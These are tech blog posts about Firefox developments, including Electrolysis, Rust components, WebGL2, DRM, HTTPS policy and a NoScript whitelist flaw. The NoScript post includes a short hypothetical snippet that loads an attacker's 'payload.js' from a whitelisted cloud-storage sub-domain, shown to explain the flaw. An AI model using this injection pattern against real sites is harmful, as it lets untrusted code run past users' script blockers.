Mozilla Launches Firefox 49

Subject: General Tech | September 20, 2016 - 04:51 PM |
Tagged: mozilla, firefox

While it was originally scheduled for last week, some last-minute issues prevented the software non-profit from releasing it until today. Also, for some reason, Firefox for Android doesn't want to update from within itself, but triggering an update from the Google Play store works. This might be temporary, or it might happen with every Firefox for Android update; I'm new to this platform.

[Image: Mozilla Firefox logo]

This version is expected to expand Mozilla's multi-process support, which separates the browser's UI from site content. Typically, Firefox disables the feature when add-ons are installed, because add-ons are given tools that make decoupling these two spaces... glitchy. Under typical conditions, JavaScript and other tasks that run in the page shouldn't affect the browser's interface, but you can see how this could be a problem if, for instance, an add-on bounces between tasks in both spaces at the same time. As such, Mozilla is pulling access to a few APIs when multi-process is enabled.
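As a rough illustration, here is the kind of legacy add-on pattern that gets glitchy once the page lives in a separate process. This is a sketch in TypeScript-flavored code for a pre-e10s XUL add-on; `gBrowser` is Firefox's privileged chrome-side tab API, and the element ID is made up:

```typescript
// Legacy add-on pattern: one script synchronously touching both "spaces".
// Under multi-process Firefox, contentDocument lives in another process,
// so direct access like this breaks or falls back to slow compatibility shims.
declare const gBrowser: any; // Firefox's privileged chrome API (assumed)

const pageDoc = gBrowser.selectedBrowser.contentDocument;       // content side
const wordCount = pageDoc.body.textContent.split(/\s+/).length;

document.getElementById("my-addon-toolbar-label")               // UI side
       ?.setAttribute("value", `${wordCount} words`);
```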

With Firefox 49, VentureBeat reports that Mozilla is allowing a “small initial set of compatible add-ons” to run alongside multi-process. If you don't have any incompatible add-ons installed, then you should see Multiprocess Windows listed as enabled in about:support. Otherwise, it will be disabled and you won't see any difference.

Interestingly, Mozilla is promoting "Refresh Firefox" on their site if you have the latest version. This basically cleans all the add-ons out of your user profile, but keeps browsing history, bookmarks, and the like. It might have been around for a while, but, if it's new, it times nicely with the multi-process rollout. On top of clearing out old, crufty add-ons, a user should see a bigger performance jump when Mozilla's enhancements are (I'm guessing) enabled.

Mozilla has also changed a few things here and there. While many of our readers will probably have hardware-accelerated video decoding, Mozilla has just added SSSE3 enhancements for when GPU support isn't available. I'm not sure of all the use cases for this, but I'd expect it would help in virtualized environments and on certain older PCs (e.g., Intel Atom and VIA Nano). I'm just speculating, though.

Source: Mozilla

Mozilla to Publish First Rust-based Module in Firefox 48

Subject: General Tech | July 16, 2016 - 05:41 PM |
Tagged: mozilla, Rust, firefox

Mozilla has been working on the Rust language for several years now. It is designed to be extremely fast, memory-safe, and easy to parallelize on multi-core processors, and it accomplishes this by having a compiler that's not afraid to tell you “Nope.” Mozilla (and others, like Samsung) wants a language with those characteristics because it makes for an extremely fast, yet secure, web browser (although there are a lot of single-threaded design choices tangled in the Web specifications).

[Image: mozilla-rust.png]

The first example will arrive next month for Windows (64-bit OS X and Linux already have it). Firefox 48 will replace a small portion of the code, originally written in C++, with a Rust-based equivalent. The affected component parses media files, extracting values like track ID, duration, resolution, and so forth. Because it's written in Rust, this ingestion should be resilient to memory-based vulnerabilities.

This probably will not be noticeable to end-users, but it's a few thousand fewer lines of code that Mozilla needs to worry about being used to hijack the browser. Mozilla is also planning on bringing URL parsing to Rust, and has already done so in Servo. You would think that the C++ code would be battle-hardened by now, but, I mean, 15-year-old open-source bugs do exist, hiding in plain sight.

Source: Mozilla

Mozilla Will Begin Electrolysis with Firefox 48

Subject: General Tech | June 9, 2016 - 01:08 AM |
Tagged: mozilla, firefox

Electrolysis (e10s) is Mozilla's codename for their multi-process initiative in Firefox. The main goal is to separate the content of the website from the user interface. This means that, if a site has long-running JavaScript or layout, Firefox will not lock up. This seems like a simple idea, except that it undoes over a decade of assumptions that were made during Firefox's development. Imagine, for instance, that you have an extension which modifies both the browser UI as well as the page content -- that's a single script that needs to run across multiple processes. Whoops!
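For context, the e10s-friendly way to bridge those two processes is asynchronous message passing. This is a hedged sketch of Firefox's frame-script mechanism; the message name and file path are made up:

```typescript
declare const gBrowser: any; // privileged chrome-side API (assumed)

// Chrome (UI) process: load a script into the content process and
// listen for its messages asynchronously instead of touching the page.
const mm = gBrowser.selectedBrowser.messageManager;
mm.loadFrameScript("chrome://my-addon/content/frame-script.js", false);
mm.addMessageListener("MyAddon:PageTitle", (msg: any) => {
  console.log("Title from content process:", msg.data.title);
});

// frame-script.js, running alongside the page content, would send:
//   sendAsyncMessage("MyAddon:PageTitle", { title: content.document.title });
```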

[Image: Mozilla Firefox logo]

This roll-out won't necessarily be immediate, though. You can install Firefox 48 and only have Electrolysis turned on some weeks later. They are starting with about 1% of eligible users, which will ramp up to all eligible users over time -- or the feature will be disabled entirely if alarm bells start to ring.

Speaking of eligible users, there are quite a few conditions that will prevent you from getting Electrolysis. Namely, if you use extensions (it's unclear if they're talking about all extensions, or just ones that use certain APIs) then you will be kept on single-process. They don't specify why, but it could very well be the situation that I mentioned in the first paragraph.

Firefox 48 is scheduled to be released in about eight weeks (the first week of August).

WebGL2 Is On Its Way

Subject: General Tech | December 31, 2015 - 10:25 PM |
Tagged: webgl2, webgl, mozilla, firefox

The Khronos Group created WebGL to bring a GPU-accelerated platform to web browsers. With a few minor differences, it is basically JavaScript bindings for OpenGL ES 2.0. It also pushed a few standards into JavaScript itself, most notably typed arrays, which let scripts view raw buffers of binary data as specific types in an unmanaged way. Basically every latest-version web browser supports it these days, and we're starting to see it used in interesting ways.
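A quick sketch of the typed-array idea -- one raw buffer, viewed as whatever type you declare:

```typescript
// One raw 16-byte allocation...
const raw = new ArrayBuffer(16);

// ...viewed as four 32-bit floats, or as sixteen unsigned bytes.
const asFloats = new Float32Array(raw);
const asBytes = new Uint8Array(raw);

asFloats[0] = 1.0;                // write through one view...
console.log(asBytes.slice(0, 4)); // ...and read the same memory as bytes
```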

[Image: WebGL2 particles demo]

The next step is WebGL2. OpenGL ES 3.0 adds a bunch of new features that are sorely needed for modern games and applications. For instance, it allows drawing to multiple render targets, which is very useful for virtual cameras in video games (although original WebGL could access this through an optional extension, WEBGL_draw_buffers, where supported). The addition of “Uniform Buffer Objects” is a better example. These allow you to store a bunch of data, like view transformation matrices, in a single buffer that can be bound to multiple shader programs, rather than uploading the values one at a time for every draw call that needs them.
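In code, the difference looks something like this sketch; the matrix and program names are made up, and `gl` is assumed to be a WebGL2 context:

```typescript
declare const viewProjectionMatrix: Float32Array;  // assumed camera data
declare const terrainProgram: WebGLProgram;        // assumed shader programs
declare const characterProgram: WebGLProgram;

const canvas = document.createElement("canvas");
const gl = canvas.getContext("webgl2") as WebGL2RenderingContext;

// Upload the shared camera matrices once, into a single buffer...
const cameraUBO = gl.createBuffer();
gl.bindBuffer(gl.UNIFORM_BUFFER, cameraUBO);
gl.bufferData(gl.UNIFORM_BUFFER, viewProjectionMatrix, gl.DYNAMIC_DRAW);
gl.bindBufferBase(gl.UNIFORM_BUFFER, 0, cameraUBO); // binding point 0

// ...then point every program's "Camera" block at that binding point,
// instead of re-uploading the uniforms for each draw call.
for (const program of [terrainProgram, characterProgram]) {
  const blockIndex = gl.getUniformBlockIndex(program, "Camera");
  gl.uniformBlockBinding(program, blockIndex, 0);
}
```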

It's hard to describe, but demos speak a thousand words.

The news today is that Mozilla Nightly now ships with WebGL2 enabled by default. It was previously hidden behind a disabled-by-default option in the browser. This doesn't seem like a big deal, but one of the largest hurdles for WebGL2 is how the browsers actually implement it. The shading language in WebGL was simple enough that most browsers translate it to DirectX HLSL on Windows (via the ANGLE layer). This is said to have the added advantage of making it harder to write malicious code, since developers never directly write what's executed. GLSL in OpenGL ES 3.0 is much more difficult to translate. I'm not sure whether the browsers will begin to trust OpenGL ES 3.0 drivers directly, or whether they finally updated the GLSL translator, but a working implementation means that something was fixed.

Unfortunately, OpenGL compute shaders are not supported in WebGL2. That said, the biggest hurdle is, again, to get WebGL2 working at all. From my talks with browser vendors over the last year or so, it sounds like features (including compute shaders) should start flying in easily once this hurdle is cleared. From there, GPGPU in a website should be much more straightforward.

NoScript Whitelist Vulnerabilities Are Almost Exploits

Subject: General Tech | July 6, 2015 - 07:01 AM |
Tagged: noscript, javascript, firefox

I do not really believe in disabling JavaScript, although the ability to control or halt execution would be nice; still, you can use an extension to remove it entirely if you want. I say this because today's story involves vulnerabilities in the NoScript extension, which locks down JavaScript and other non-static content. By “vulnerabilities”, we mean the ability to execute JavaScript -- something every major browser vendor enables by default because they consider it, on its own, safe for their users.

[Image: NoScript logo]

This is like a five-year-old figuring out how to unlock a fireworks case full of paper crackers.

Regardless, there are two vulnerabilities, both of which have already been patched. Both take advantage of the whitelist functionality to slip malicious code through. By default, NoScript trusts a handful of domains, because blocking every script ever would break too much of the internet.

The first problem is that the whitelist has a little cruft, including domain names that are useless and even some that have expired and are up for sale. To prove a point, Matthew Bryant purchased zendcdn.net and used it to serve his own JavaScript. The second problem is similar, but slightly different. Rather than finding an expired domain, he found that some whitelist entries, such as googleapis.com, have sub-domains, like storage.googleapis.com, that accept untrusted user content (it is part of Google's Cloud Platform).
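To see why that matters, consider how little an attacker needs: once the parent domain is whitelisted, any user-writable sub-domain can serve script that NoScript waves through. A hypothetical sketch -- the bucket path here is made up:

```typescript
// Attacker-controlled page: NoScript's default whitelist matched
// googleapis.com, so this sub-domain script executes anyway,
// even though anyone can upload content to that service.
const script = document.createElement("script");
script.src = "https://storage.googleapis.com/some-bucket/payload.js"; // hypothetical
document.head.appendChild(script);
```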

Again, even though JavaScript is about as secure as you can get in an executable language, you should be allowed to control what executes on your machine. As stated, NoScript has already addressed these issues in a recent update.

Firefox 38 Launches with (and also without) DRM Support

Subject: General Tech | May 13, 2015 - 05:06 PM |
Tagged: mozilla, firefox, DRM

Mozilla has just released Firefox 38. With it comes the controversial Adobe Primetime DRM implementation through the W3C's Encrypted Media Extensions (EME). Or, maybe not. If you upgrade the browser through one of the default channels, the Adobe Primetime Content Decryption Module will appear in the Plugins tab of your Add-ons manager on Windows Vista or later (but it might take a few minutes after the upgrade).

[Image: Mozilla Firefox logo]

Alternatively, you can use Mozilla's EME-free installer for Firefox and avoid it altogether.

I have mentioned my concerns about DRM in the past. EME does not particularly bother me, because it is just a plugin architecture, but the fundamental concept does. Simply put, copy protection does very little good and a whole lot of bad. If your movie leaks before it is legally available in consumers' hands, as regularly happens, then what do you expect to accomplish after the fact? It takes one instance to be copied infinitely, and that instance often comes from the film company's own supply chain, not its customers. Moreover, DRM has been found to reduce sales and hurt the customer experience (above and beyond the valid ideological concerns).

Beyond the DRM inclusion, several new features were added. One of the more interesting ones is the BroadcastChannel API. This standard allows a web application to share data between “contexts” that have the same “user agent and origin”. In other words, the messages must stay within the same browser and the same app (even across secondary instances of it). This will allow sites to do things like multi-monitor split screen, which is useful for games and utilities.
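Usage is pleasantly simple. A minimal sketch, with a made-up channel name, of two same-origin windows talking to each other:

```typescript
// Window A (say, the main game view):
const channel = new BroadcastChannel("game-state");
channel.postMessage({ score: 1200, level: 3 });

// Window B (say, a stats panel dragged to a second monitor):
const listener = new BroadcastChannel("game-state");
listener.onmessage = (event: MessageEvent) => {
  console.log("Received state:", event.data); // { score: 1200, level: 3 }
};
```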

WebRTC has also been upgraded with multistream support and renegotiation. Even though the general public thinks of WebRTC as a webcam and voice chat standard, it actually allows arbitrary data channels. For example, “BananaBread” is a first-person shooter that uses WebRTC to synchronize multiplayer state. Character and projectile positions are very much not webcam or audio data, but WebRTC doesn't care.
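A hedged sketch of that arbitrary-data side of WebRTC; signalling -- exchanging offers, answers, and ICE candidates through some server -- is omitted, and the channel name is made up:

```typescript
const peer = new RTCPeerConnection();
const sync = peer.createDataChannel("game-sync");

sync.onopen = () => {
  // Arbitrary application data; nothing about this is audio or video.
  sync.send(JSON.stringify({ player: 1, x: 10.5, y: 3.2 }));
};

sync.onmessage = (event: MessageEvent) => {
  const state = JSON.parse(event.data);
  // ...apply the remote player's position to the game world...
};
```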

Firefox 38 launched on May 12th with an optional, DRM-free build.

Source: Mozilla

Forcing HTTPS Is Being Discussed

Subject: General Tech | April 14, 2015 - 08:08 PM |
Tagged: mozilla, http, https, firefox

On the Mozilla dev-platform newsgroup, hosted at Google Groups, a proposal to deprecate insecure HTTP is being discussed. The idea is that HTTPS needs to be adopted, and organizations will not do it without being pushed. The plan is to get browser vendors to refuse to activate new features, and eventually to disable old features, unless the site is loaded as a “privileged context”.

[Image: 22-mozilla-2.jpg]

This has sparked a debate, which was the whole point of course, about how secure we want the Web to be. What features should we retroactively disable unless they are served over HTTPS? Things that access your webcam and microphone? Things that write to your hard drive? Then there is the question of how to handle self-signed certificates, which provide encryption without verification, and so forth.
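To make the proposal concrete, here is a hedged sketch of what feature-gating could look like. The exact definition of “privileged context” was still under debate, so the bare HTTPS check here is an assumption:

```typescript
// Hypothetical gate: only allow a powerful API over a secure transport.
function isPrivilegedContext(): boolean {
  return location.protocol === "https:"; // simplification of the real rules
}

if (isPrivilegedContext()) {
  navigator.mediaDevices.getUserMedia({ video: true })
    .then((stream) => { /* ...webcam access granted... */ });
} else {
  console.warn("Refusing webcam access over insecure HTTP.");
}
```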

Note: Websites cannot access or create files on your hard drive, but standards like localStorage and IndexedDB allow websites to have their own spaces for persistence. This is to allow, for instance, a 3D game to cache textures (and so forth) so you don't need to download them every time.
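As a rough sketch of that caching pattern, using localStorage for brevity (IndexedDB is the better fit for large binary assets like textures):

```typescript
// Fetch a text asset once, then serve it from the site's own storage.
async function getAsset(url: string): Promise<string> {
  const cached = localStorage.getItem(url);
  if (cached !== null) return cached;  // no network hit on repeat visits

  const response = await fetch(url);
  const body = await response.text();
  localStorage.setItem(url, body);     // persist in the site's sandboxed space
  return body;
}
```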

Personally, this concerns me greatly. I started helping Mozilla a couple of years ago, a few weeks after I saw Microsoft's Windows 8 developer certification program. I do not like the thought of someone being able to stifle creation and expression, and the web was looking like it might be the last bastion of unrestricted development for the general public.

In the original Windows Store requirements, no browser could exist unless it was a skin of Trident. This meant that, if a site didn't work in Internet Explorer, it didn't exist. If you didn't want to play by their rules? Your app didn't get signed, and your developer certificate could even be revoked by Microsoft, or someone with authority over them. You could imagine the problems an LGBT-focused developer might have in certain countries, even if Microsoft likes their creations.

This is obviously not as bad as that. In the Windows Store case, there was one authority, whereas HTTPS can be authenticated by numerous providers. Also, if self-signed certificates are deemed “secure enough”, it would likely avoid the problem. You would not need to ask one of a list of authorities for permission to exist; you could secure the connection yourself. Of course, that is a barrier of skill for many, and that is its own concern.

So we'll see, but I hope that Mozilla will take these concerns as a top priority in their decisions.

Source: Mozilla

Since TLS connections mostly ignore OCSP, Firefox is creating yet another solution

Subject: General Tech | March 5, 2015 - 01:46 PM |
Tagged: security, OneCRL, irony, firefox, CRLSet, chrome

It seems somehow strange that the vast majority of 'secure' connections still completely ignore the industry standards developed to ensure security, in favour of creating their own solutions, but that is the world a security professional lives in. The basic design of OCSP carries a lot of extra bandwidth usage and, while OCSP stapling -- in which the server periodically caches a signed, time-limited OCSP response and attaches it to the handshake -- would ameliorate this, your TLS connection is not likely to support that solution. Instead of fixing the root cause and utilizing existing standards, Firefox 37 will introduce a brand new solution: a list of revoked certificates, ironically called OneCRL, which will be pushed out to Firefox users, duplicating the CRLSet that Chrome has already developed and maintains.

This is good for the end user, in that it does add security to their browsing session, but for those truly trying to make the net a safer place it offers yet another list to keep track of, and for attackers yet another vector of attack. At some point we will have to stop referring to standards when referencing networking technology. Pore over the links in the Slashdot post and read through the comments to share in the frustration, or to familiarize yourself with these concepts if the acronyms are unfamiliar.

[Image: firefox-crset-onecrl.jpg]

"The next version of Firefox will roll out a 'pushed' blocklist of revoked intermediate security certificates, in an effort to avoid using 'live' Online Certificate Status Protocol (OCSP) checks. The 'OneCRL' feature is similar to Google Chrome's CRLSet, but like that older offering, is limited to intermediate certificates, due to size restrictions in the browser."

Source: Slashdot

Mozilla Partners with Yahoo! for Five Year Search Deal

Subject: General Tech | November 20, 2014 - 10:10 PM |
Tagged: yahoo, mozilla, google, firefox

Mozilla, developer of the Firefox web browser, has been mostly funded by Google for the last decade. Between 2005 and 2011, the search giant slowly ramped up its contributions from around $50 million USD per year to just over $100 million in the final year. All of this money was to keep the default search engine set to Google in the location and search bars. At the time, journalists were voicing concerns that Mozilla would be cut off after the success Google saw with its Chrome browser.

[Image: Mozilla Firefox logo]

In December 2011, Google and Mozilla surprised the world with a different announcement: $300 million per year until November 2014, or almost three times Google's previous annual contribution. I could not help but feel it was like a light bulb that flares before it burns out, although later rumors claimed that Microsoft and Yahoo drove up Google's bid with high counter-offers. Of course, that deal ends this month, and Google is no longer the winning bidder, if they even proposed a deal at all.

This time, Yahoo won for the next five years (in the US) with a currently undisclosed sum. Yandex will be the default for Russia, and Baidu has been renewed as the default in China.

Yahoo also committed to supporting the Do Not Track (DNT) header for Firefox browsers. If your settings have DNT enabled, the search engine will adjust its behavior to acknowledge your request for privacy. One thing that has not been mentioned is how they will react to your request. This could be anything from treating you as completely anonymous, to personalizing your search results but not your ads, to personalizing your ads but not your search results, to only looking at the geographic location of your IP address, and so forth.
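For reference, the signal itself is tiny. Servers see a `DNT: 1` request header, and a page can read the same preference client-side via navigator.doNotTrack; everything beyond that is up to the site:

```typescript
// navigator.doNotTrack is "1" when the user has opted out of tracking.
if (navigator.doNotTrack === "1") {
  // Honor the request: e.g., skip personalized results and ads.
} else {
  // No stated preference; personalization is (arguably) fair game.
}
```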

The search experience is not what you will get by going to the Yahoo homepage today; the new site was developed in collaboration with Mozilla and will launch for Firefox users in December. It will go live for every other Yahoo user in 2015.

Source: Mozilla

Mozilla Approves Plans for 64-Bit Firefox on Windows

Subject: General Tech | October 6, 2014 - 03:45 AM |
Tagged: windows, mozilla, firefox, 64-bit

If you had a reason to use it, Mozilla has been compiling Firefox Nightly as a 64-bit application for Windows over the last several months. It is not a build designed for the general public; in fact, I believe it basically exists only to make sure that some arbitrary commit did not horribly break anything. That might change relatively soon, though.

[Image: Mozilla Firefox logo]

According to Mozilla's "internal", albeit completely public wiki, the non-profit organization is currently planning to release an official, 64-bit version of Firefox 37. Of course, all targets in Firefox are flexible and, ultimately, it is only done when it is done. If everything goes to schedule, that should be March 31st.

The main advantage is for high-performance applications (although there are some arguments for security, too). One example: open numerous tabs, to drive Firefox's memory usage up, then attempt to load a Web application like BananaBread. Last I tried, it simply would not load (unless you cleaned up memory usage somehow, like restarting the browser). A 32-bit process can only address a few gigabytes of memory, so the app runs out of address space and just gives up. You can see how this would be difficult for higher-end games, video editing utilities, and so forth. This will not be the case when 64-bit comes around.

If you are looking to develop a web app, be sure to check out the 64-bit Firefox Nightly builds. Unless plans change, it looks like you will have even more potential customers soon. That is unless, of course, you are targeting Mac OS X or Linux, which already have 64-bit binaries available. Also, why are you targeting specific operating systems with a website?

Source: Mozilla